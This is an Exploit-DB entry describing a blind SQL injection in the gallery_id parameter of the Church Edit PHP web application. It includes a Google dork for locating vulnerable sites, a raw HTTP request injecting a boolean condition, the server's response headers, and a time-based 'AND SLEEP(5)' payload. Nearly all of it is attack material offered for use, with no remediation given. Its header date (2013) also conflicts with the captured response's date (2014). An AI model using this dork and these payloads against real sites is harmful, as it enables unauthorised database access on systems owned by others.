Church Edit - Blind SQL Injection

ID EDB-ID:32282
Type exploitdb
Reporter ThatIcyChill
Modified 2014-03-15T00:00:00


Church Edit - Blind SQL Injection. Webapps exploit for php platform

                                            Exploit Title: Church Edit Blind SQL Injection
Google Dork: inurl:This website is powered by Church Edit
Date: 15/3/2013
Exploit Author: ThatIcyChill
Vendor Homepage:
Version: Initial Release

The file "/photos/gallery.php" contains a Blind SQL
Injection Vulnerability in the '?gallery_id=' variable in the URL.

GET /photos/gallery.php?gallery_id=1%20and%201=2&pg=1 HTTP/1.1
Host: <>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Mar 2014 17:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Sample injection - AND SLEEP(5)&pg=1